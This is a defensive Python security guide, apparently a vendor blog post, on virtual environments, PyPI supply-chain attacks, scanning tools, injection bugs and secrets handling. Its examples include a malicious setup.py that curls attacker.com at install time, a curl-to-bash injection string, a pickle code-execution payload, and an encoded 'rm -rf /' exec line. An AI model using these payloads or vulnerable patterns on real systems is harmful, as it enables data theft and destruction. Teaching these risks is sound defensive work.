Python is everywhere — scripting, automation, security tooling, data pipelines, web backends. That ubiquity comes with an attack surface that is easy to underestimate. Python’s design philosophy (batteries included, dynamic, flexible) creates categories of risk that simply do not exist in stricter languages.
This guide covers two scenarios: the risks you face when writing Python code, and the risks you face when downloading and running scripts or packages someone else wrote. Both matter, and the failure modes are different.
TL;DR
- Always use virtual environments — but understand that venv is not a sandbox: malicious code inside a venv can still read files, make network calls, and access your secrets
- PyPI has no pre-publication malware scanning — typosquatting, dependency confusion, and maintainer takeovers are active attack vectors
- Use `guarddog` before installing unknown packages, `pip-audit` for CVE scanning, and `bandit` on your own code
- `eval()`, `exec()`, `pickle`, and `subprocess` with user input are injection vulnerabilities, not just bad practice
- Secrets in source code get committed, pushed, and leaked — use environment variables or a secrets manager
- Before running any downloaded script: read it, check its imports, and verify the package name character by character
Part 1: The Environment — Isolation Before Anything Else
Virtual Environments Are a Security Boundary, Not Just Convenience
Most Python developers know venvs prevent dependency conflicts. Fewer think of them as a security control — but they are.
What happens without a venv:
```bash
# No venv — pip installs globally, as your user or as root
pip install requests
# Now requests (and anything it pulls in) has access to your system Python
# and potentially to site-packages shared across all your projects
```

The problems this creates:
- Cross-project contamination — a malicious package installed for Project A is available to Project B. Venvs break this: each environment is isolated.
- Privilege escalation via system Python — if you habitually run `sudo pip install`, you are installing third-party code with root privileges. Any malicious package that runs code at install time (via `setup.py` or PEP 517 hooks) executes as root.
- No clean uninstall path — without venvs, you cannot reliably remove a package and all its side effects. A compromised environment can be nuked and recreated; a contaminated system Python is harder to clean.
Always use a venv:
```bash
# Create and activate
python -m venv .venv
source .venv/bin/activate    # Linux/macOS
.venv\Scripts\activate       # Windows

# Install inside the venv only
pip install requests

# Deactivate when done
deactivate
```

Modern projects should use `pyproject.toml` with a tool like uv or poetry that enforces isolation automatically. The point is the same: code you did not write runs in a contained environment where damage is limited.
Venv Is Not a Sandbox
This is the most common misconception about virtual environments: a venv does not restrict what code can do at the OS level.
A malicious package installed inside a venv can still:
- Read any file your user account can read — including `~/.ssh/`, `~/.aws/credentials`, browser cookie databases
- Make outbound network connections to exfiltrate data
- Spawn subprocesses (`subprocess`, `os.system`)
- Read environment variables — including `AWS_SECRET_ACCESS_KEY`, `DATABASE_URL`, any secret you have set in your shell
- Write or delete files anywhere your user has write access
- Access other venvs on the same machine
The venv boundary is a Python module namespace boundary, not an OS-level isolation boundary. It prevents package conflicts between projects. It does not prevent malicious code from running.
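To make that concrete, here is a minimal sketch of what any package running inside an activated venv can still do. The paths and variable names are illustrative; nothing in this snippet is venv-specific, which is exactly the point:

```python
import os
from pathlib import Path

# A venv changes sys.path, not OS permissions — this code behaves
# identically inside or outside a virtual environment.
ssh_key = Path.home() / ".ssh" / "id_rsa"          # readable if it exists
aws_creds = Path.home() / ".aws" / "credentials"   # same

for path in (ssh_key, aws_creds):
    if path.exists():
        print(f"readable from inside the venv: {path}")

# Shell secrets are inherited by every child process, venv or not
for name in ("AWS_SECRET_ACCESS_KEY", "DATABASE_URL"):
    if name in os.environ:
        print(f"visible in os.environ: {name}")
```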
For actual isolation when running untrusted code, use Docker with restricted permissions:
```bash
# No network, no access to home directory, read-only filesystem except /tmp
docker run --rm \
  --network none \
  --read-only \
  --tmpfs /tmp \
  -v $(pwd)/suspicious_script.py:/script.py:ro \
  python:3.12-slim python /script.py
```

This is the difference: venv protects your project dependencies from each other. Docker (or a VM) protects your system from untrusted code.
The --user Flag Is Not a Safe Alternative
pip install --user installs to ~/.local/lib/python3.x/site-packages. This avoids root, but:
- It shares across all projects for that user
- It is included in `sys.path` by default, meaning a malicious package installed with `--user` can still affect all your Python processes
- It still runs `setup.py` and build hooks with your full user privileges
Use venvs. --user is a compromise, not a solution.
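You can see the exposure directly: the stdlib `site` module reports the per-user directory that every non-venv interpreter run as your account will import from.

```python
import site

# This directory is on sys.path for every Python process you run outside
# a venv (user-site is disabled inside venvs) — which is why a single
# malicious `pip install --user` reaches all of those processes.
print(site.getusersitepackages())
```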
Part 2: Package Security — What PyPI Won’t Catch for You
PyPI Has No Pre-Publication Malware Scanning
Anyone with a PyPI account can publish a package. There is no review process, no sandbox execution of install hooks before publication. PyPI does conduct post-hoc malware scanning and removes packages when discovered — but the window between publication and removal can be hours or days.
During that window, automated systems (CI/CD pipelines, Docker builds, developer laptops) may already have installed the package.
Typosquatting — One Character Away
Attackers register package names that are visually similar to popular packages:
| Legitimate | Typosquatted |
|---|---|
| `requests` | `request` / `requestss` / `requuests` |
| `numpy` | `nunpy` / `nummpy` / `numpy-base` |
| `Pillow` | `Pil` / `pillow-python` |
| `boto3` | `bot03` (zero, not o) / `boto` |
| `pycrypto` | `py-crypto` / `pycrypt0` |
The malicious package usually works as expected — it installs the real library as a dependency and adds its own malicious code on top. The victim sees no errors.
How to protect yourself:
```bash
# Always verify the exact package name on pypi.org before installing
# Check: publication date, download count, maintainer history

# Use pip-audit to scan installed packages for known vulnerabilities
pip install pip-audit
pip-audit

# Use our own gate-cli for supply chain risk scoring
pip install gate-cli
gate scan requests numpy pandas
```

Dependency Confusion
If your internal package registry serves packages by name, and a package with that name also exists on PyPI, pip may fetch the PyPI version instead of your internal one — especially if the PyPI version has a higher version number.
Attackers register public PyPI packages with names that match internal corporate package names. When a developer or CI pipeline runs pip install, they get the attacker’s package.
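The mechanics can be sketched in a few lines. This is a simplified model of the resolution behavior, not pip's actual code:

```python
# Pip merges candidate releases from every configured index and picks the
# highest version, with no built-in preference for the internal registry.
candidates = [
    {"version": (1, 2, 0), "index": "internal-registry"},  # your real package
    {"version": (99, 0, 0), "index": "pypi.org"},          # attacker's copy
]

chosen = max(candidates, key=lambda c: c["version"])
print(chosen["index"])  # → pypi.org — the attacker wins on version number
```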
Mitigation:
```ini
# pip.conf — route installs through your private registry
[global]
index-url = https://your-internal-registry/simple/
extra-index-url = https://pypi.org/simple/
```

Caveat: `extra-index-url` does not make the primary index take priority. Pip treats all configured indexes as equals and picks the best candidate version from any of them, which is exactly what dependency confusion exploits. Where possible, drop `extra-index-url` and have your internal registry proxy PyPI instead.

```bash
# Better: use --no-index for packages that should only come from internal sources
pip install --no-index --find-links=./vendor/ internal-package
```

setup.py and Build Hook Execution at Install Time
When you run pip install somepackage, pip may execute setup.py or PEP 517 build hooks — before you have reviewed any code. This is arbitrary code execution by design.
```python
# A malicious setup.py — runs at pip install time
from setuptools import setup
import subprocess

# This executes during `pip install`
subprocess.run(
    ["curl", "https://attacker.com/exfil?host=$(hostname)", "-s"],
    capture_output=True,
)

setup(name="totally-legitimate-package", ...)
```

For untrusted packages: prefer wheels with `pip install --only-binary=:all:` (installing a wheel does not run `setup.py`), or use `pip download` to fetch the package without installing, then inspect the source before installing.
Pinning Dependencies — Version Locking Is a Security Control
Floating dependencies (requests>=2.0) will install whatever is current at the time. If a package is later compromised (maintainer account takeover, malicious release), your next pip install or Docker build fetches the compromised version.
```text
# Bad — installs whatever is latest
requests>=2.28.0

# Better — pins exact version
requests==2.31.0

# Best — pins version AND hash
# Generate with: pip-compile --generate-hashes requirements.in
```

Hash pinning means pip refuses to install a package whose content does not match the recorded hash — even if the version number is the same. It makes supply chain substitution attacks significantly harder.
Part 3: Scanning Tools — What to Use and When
No single tool catches everything. The tooling landscape splits into three distinct categories that solve different problems — use all three.
Category 1: Vulnerability Scanners (Known CVEs)
These check whether your installed packages have known, published vulnerabilities. They are fast, reliable, and catch the easy stuff — but they are useless against a new malicious package that has no CVE yet.
pip-audit — the current standard, maintained by PyPA (the Python Packaging Authority):
```bash
pip install pip-audit

# Scan current environment
pip-audit

# Scan a requirements file without installing
pip-audit -r requirements.txt

# Output as JSON for CI
pip-audit --format json -o audit-results.json
```

Safety — uses the Safety DB (maintained by PyUp), good second opinion:
```bash
pip install safety
safety check
safety check -r requirements.txt
```

Snyk — commercial with a free tier, strongest CI/CD integration, pulls from multiple vulnerability databases including its own:
```bash
npm install -g snyk    # yes, installed via npm
snyk auth
snyk test --file=requirements.txt
```

Snyk’s advantage: it tracks transitive dependencies (dependencies of dependencies) and can suggest upgrade paths that fix multiple issues at once. It also monitors your project continuously and alerts when new CVEs are published against your locked versions.
Trivy — broad scanner (containers, filesystems, repos), useful when Python is one part of a larger stack:
```bash
# Scan a directory containing requirements.txt or Pipfile.lock
trivy fs .

# Scan a Docker image that contains Python packages
trivy image my-python-app:latest
```

Category 2: Malicious Package Detectors (Behavioral Analysis)
These look for suspicious patterns in package code — network calls in setup.py, obfuscated strings, credential-harvesting patterns, unusual file system access. This is what catches typosquats and supply chain attacks that have no CVE.
guarddog (Datadog) — the strongest open source tool in this category:
```bash
pip install guarddog

# Scan a single package before installing — downloads and inspects without executing
guarddog pypi scan requests

# Scan everything in a requirements file
guarddog pypi verify requirements.txt
```

guarddog checks for: `setup.py` network calls, command execution at install time, obfuscated code (base64 + `exec` patterns), credential file access, reverse shell patterns, and more. It inspects the package source without running it.
gate-cli — our own supply chain scanner, covers quarantine window risk (newly published packages with few downloads are statistically more likely to be malicious):
```bash
pip install gate-cli
gate scan requests numpy pandas
gate scan -r requirements.txt
```

gate focuses on signals that CVE scanners miss: publication recency, maintainer reputation, download velocity anomalies, and install-hook presence.
What these tools cannot do: detect a package that installs cleanly and only activates malicious behavior at runtime under specific conditions (e.g., when AWS_PROFILE is set, or when run on a CI server). That class of attack requires behavioral monitoring at runtime.
Category 3: Static Analysis for Your Own Code
These scan code you wrote for security vulnerabilities — injection risks, hardcoded secrets, insecure function use. They do not scan third-party packages.
Bandit — Python-specific, catches the issues covered in Part 4 of this article:
```bash
pip install bandit

# Scan a file or directory
bandit -r myproject/

# High severity, high confidence only
bandit -r myproject/ -lll -iii

# Output as JSON for CI
bandit -r myproject/ -f json -o bandit-report.json
```

Bandit flags: `eval()` and `exec()` calls, `subprocess` with `shell=True`, `pickle` usage, hardcoded passwords, weak cryptography, SQL injection patterns, and more. The false positive rate is low enough for CI enforcement.
Semgrep — more powerful, supports custom rules, good for team-wide enforcement:
```bash
pip install semgrep

# Run with the Python security ruleset
semgrep --config=p/python-security .

# Run the OWASP Top 10 ruleset
semgrep --config=p/owasp-top-ten .
```

Semgrep’s advantage: you can write custom rules for your codebase. If your project has a pattern that should never appear (e.g., direct SQL string concatenation), write a rule for it once and it becomes part of every developer’s pre-commit check.
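For example, a custom rule banning SQL string concatenation might look like the following sketch. The rule id and patterns are illustrative, not from the Semgrep registry:

```yaml
rules:
  - id: no-sql-string-concat
    languages: [python]
    severity: ERROR
    message: Build SQL with bound parameters, not string concatenation
    pattern-either:
      - pattern: $CURSOR.execute("..." + $X)
      - pattern: $CURSOR.execute("..." % $X)
      - pattern: $CURSOR.execute(f"...")
```

Save it under a directory such as `rules/` and run it alongside the registry rulesets with `semgrep --config rules/ .`.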
Recommended Workflow
| Stage | Tool | What it catches |
|---|---|---|
| Before `pip install` | `guarddog pypi scan` | Malicious packages, behavioral patterns |
| After install / in CI | pip-audit | Known CVEs in dependencies |
| In CI (deeper) | snyk test | CVEs + transitive deps + upgrade paths |
| Pre-commit / CI | bandit | Security issues in your own code |
| Pre-commit / CI | semgrep | Custom rules + OWASP patterns |
| Container builds | trivy image | Full stack: OS packages + Python |
For production projects, run at minimum pip-audit + bandit in CI. Add guarddog for any project that installs packages dynamically or from less-known sources. Snyk is worth the free-tier signup for projects with complex dependency trees.
Part 4: Code You Write — The Python Injection Landscape
eval() and exec() — Injection by Design
eval() executes any Python expression. exec() executes any Python statement. If either receives user-controlled input, you have arbitrary code execution.
```python
# Vulnerable — user can pass: "__import__('os').system('rm -rf ~')"
user_input = input("Enter a formula: ")
result = eval(user_input)

# Vulnerable exec — user can define and run anything
exec(user_input)
```

There is no safe way to sandbox `eval()` or `exec()` with user input in standard CPython. The `__builtins__` restriction approach has been bypassed repeatedly.
The fix: don’t use them on user input. Use ast.literal_eval() if you need to parse Python literals (strings, numbers, lists, dicts) — it raises ValueError on anything that is not a literal value.
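Concretely, literals parse while anything executable is rejected before it runs (safe to try):

```python
import ast

# Literal structures round-trip fine
assert ast.literal_eval("[1, 2, {'a': 3}]") == [1, 2, {"a": 3}]

# A function call is not a literal — rejected before evaluation
try:
    ast.literal_eval("__import__('os').system('whoami')")
except ValueError:
    print("rejected: not a literal")
```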
```python
import ast

# Safe — only evaluates literals, raises ValueError on code
data = ast.literal_eval(user_input)
```

pickle — Deserialization Is Code Execution
Python’s pickle module serializes and deserializes Python objects. Deserializing a pickle payload executes Python code — the object’s __reduce__ method runs during loading.
```python
import pickle, os

class Exploit:
    def __reduce__(self):
        return (os.system, ("whoami",))

# This executes os.system("whoami") on the machine that loads it
payload = pickle.dumps(Exploit())

# On the victim's machine:
pickle.loads(payload)  # ← arbitrary code execution
```

Never unpickle data from untrusted sources. This includes: files uploaded by users, data from external APIs, inter-service messages if the sender is not fully trusted.
Safe alternatives:
- `json` — for data exchange (no code execution risk)
- `msgpack` — for binary serialization
- `protobuf` — for typed inter-service communication
```python
# Instead of pickle for data exchange:
import json

data = json.dumps(my_object)
restored = json.loads(data)
```

subprocess — Shell Injection
subprocess.run() with shell=True passes the command to /bin/sh — if any part of the command includes user input, you have shell injection.
```python
# Vulnerable — user input is "filename; curl attacker.com/shell.sh | bash"
filename = request.args.get("file")
subprocess.run(f"cat {filename}", shell=True)

# Safe — pass as list, no shell interpolation
subprocess.run(["cat", filename], shell=False)
```

Rule: never use `shell=True` with any variable content. Pass arguments as a list. `subprocess` with a list does not invoke a shell — each element is passed as a literal argument to the executable.
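If a shell is genuinely unavoidable (say, you need a pipeline), quote every interpolated value with the stdlib `shlex.quote`. A fallback sketch, not a substitute for the list form:

```python
import shlex
import subprocess

filename = "report.txt; rm -rf ~"  # hostile input

# shlex.quote wraps the value in single quotes so the shell sees one
# literal argument instead of a command separator
cmd = f"wc -l {shlex.quote(filename)}"
print(cmd)  # → wc -l 'report.txt; rm -rf ~'
subprocess.run(cmd, shell=True)  # wc reports a missing file; nothing is deleted
```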
Path Traversal
File operations with user-supplied paths can reach outside the intended directory:
```python
# Vulnerable — user passes "../../etc/passwd"
filename = request.args.get("file")
with open(f"/var/data/uploads/{filename}") as f:
    return f.read()
```

Fix: resolve the final path and verify it is still inside the intended root:
```python
from pathlib import Path

BASE_DIR = Path("/var/data/uploads").resolve()
requested = (BASE_DIR / filename).resolve()

# Path.is_relative_to requires Python 3.9+
if not requested.is_relative_to(BASE_DIR):
    raise PermissionError("Path traversal attempt")

with open(requested) as f:
    return f.read()
```

Part 5: Secrets — The Leak That Keeps on Leaking
Hardcoded Credentials Are a Permanent Vulnerability
Secrets committed to source code get into git history. Even if you remove them in the next commit, they exist in every clone made before that commit — and in the history that git log reveals.
```python
# This is in your git history forever
API_KEY = "sk-live-xxxxxxxxxxxxxxxxxxx"
DB_PASSWORD = "SuperSecret123!"
```

The fix: environment variables or a secrets manager, never source code.
```python
import os

# Load from environment
API_KEY = os.environ["API_KEY"]
DB_PASSWORD = os.environ["DB_PASSWORD"]

# Or use python-dotenv for development (never commit the .env file)
from dotenv import load_dotenv
load_dotenv()
API_KEY = os.getenv("API_KEY")
```

```gitignore
# .gitignore — add before first commit
.env
*.env
.env.local
secrets.json
```

If you have already committed a secret: rotate it immediately. Removing it from the current commit does not help — the secret is in history and in every existing clone.
Pre-commit scanning:
```bash
# Install detect-secrets to catch secrets before they hit the repo
pip install detect-secrets
detect-secrets scan > .secrets.baseline
detect-secrets audit .secrets.baseline
```

Part 6: Before You Run a Downloaded Script
Downloaded scripts (from GitHub, gists, blog posts, Reddit) deserve a read-through before execution. The checklist:
1. Check the imports
```python
# Red flags in a script claiming to be a "system cleaner"
import subprocess
import socket
import base64
import os
```

Any script that imports `socket`, `subprocess`, and `base64` together without a clear reason is suspicious. Network + shell execution + encoding is a common malware pattern.
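Checking imports does not require running the script: the stdlib `ast` module can list them statically. A sketch, where `list_imports` is our own helper rather than a library function:

```python
import ast

def list_imports(source: str) -> set[str]:
    """Return top-level module names imported by Python source,
    without executing any of it."""
    modules: set[str] = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            modules.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module:
            modules.add(node.module.split(".")[0])
    return modules

sample = "import socket\nimport subprocess\nimport base64\n"
found = list_imports(sample)
if {"socket", "subprocess", "base64"} <= found:
    print("red flag: network + shell + encoding imports together")
```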
2. Look for obfuscation
```python
# Red flags — obfuscated payload
exec(base64.b64decode("aW1wb3J0IG9zOyBvcy5zeXN0ZW0oInJtIC1yZiAvIik="))

# Decode it before running anything
import base64
print(base64.b64decode("aW1wb3J0IG9zOyBvcy5zeXN0ZW0oInJtIC1yZiAvIik="))
# → b'import os; os.system("rm -rf /")'
```

3. Run in a disposable environment
For any script you are not fully confident about, run it in a Docker container or VM with no access to your credentials, home directory, or network:
```bash
# Disposable container — script cannot reach your files or credentials
docker run --rm --network none -v $(pwd)/script.py:/script.py python:3.12-slim python /script.py
```

4. Verify package names character by character
Before pip install anything-from-a-blog-post: go to pypi.org/project/anything-from-a-blog-post and verify:
- The package exists
- The publication date is not from yesterday with 3 downloads
- The maintainer has a history
- The description matches what was advertised
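Most of these signals are available programmatically from PyPI's JSON API at `https://pypi.org/pypi/<name>/json`. A sketch that needs network access to do anything useful:

```python
import json
import urllib.request

def package_metadata(name: str) -> dict:
    """Fetch a package's metadata from PyPI's JSON API."""
    url = f"https://pypi.org/pypi/{name}/json"
    with urllib.request.urlopen(url, timeout=10) as resp:
        return json.load(resp)

try:
    meta = package_metadata("requests")
    print(meta["info"]["name"], meta["info"]["version"])
    # A package with one release and a very recent upload is a red flag
    print("release count:", len(meta["releases"]))
except OSError:  # no network (URLError subclasses OSError)
    print("offline — run this with network access")
```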
Quick Reference Checklist
| Area | What to do |
|---|---|
| Environments | Always use venv; never sudo pip install |
| Venv ≠ sandbox | Venv isolates modules, not OS access — use Docker for real isolation |
| Dependencies | Pin versions; use hash verification for production |
| Package names | Verify on pypi.org before installing; check character by character |
| Install hooks | Know that setup.py runs at install time — use guarddog first |
| Scanning: malicious | `guarddog pypi scan <package>` before installing unknowns |
| Scanning: CVEs | pip-audit in CI; Snyk for transitive dependency tracking |
| Scanning: your code | bandit + semgrep in CI or pre-commit |
| `eval` / `exec` | Never on user input; use `ast.literal_eval` for literals |
| `pickle` | Never deserialize untrusted data |
| `subprocess` | Never `shell=True` with variable content; pass as list |
| Path operations | Resolve and validate paths stay within intended root |
| Secrets | Environment variables only; .gitignore your .env; rotate anything committed |
| Downloaded scripts | Read before running; check imports; run in Docker with --network none |
Related Posts
- We Built a Supply Chain Scanner — Here’s What We Learned — gate-cli scans pip and npm packages for supply chain risk before you install them
- The Package You Trusted: How the Axios Supply Chain Attack Happened — real-world supply chain attack anatomy; the same patterns apply to PyPI
- LOLBins in 2026: How Attackers Use Windows Against Itself — `subprocess` abuse in Python is the scripting equivalent of LOLBin abuse at the OS level
- Invisible Characters as an Attack Vector — Unicode injection in code applies directly to Python scripts in repositories
- GitHub Secrets Management Crisis — what happens when secrets make it into source code at scale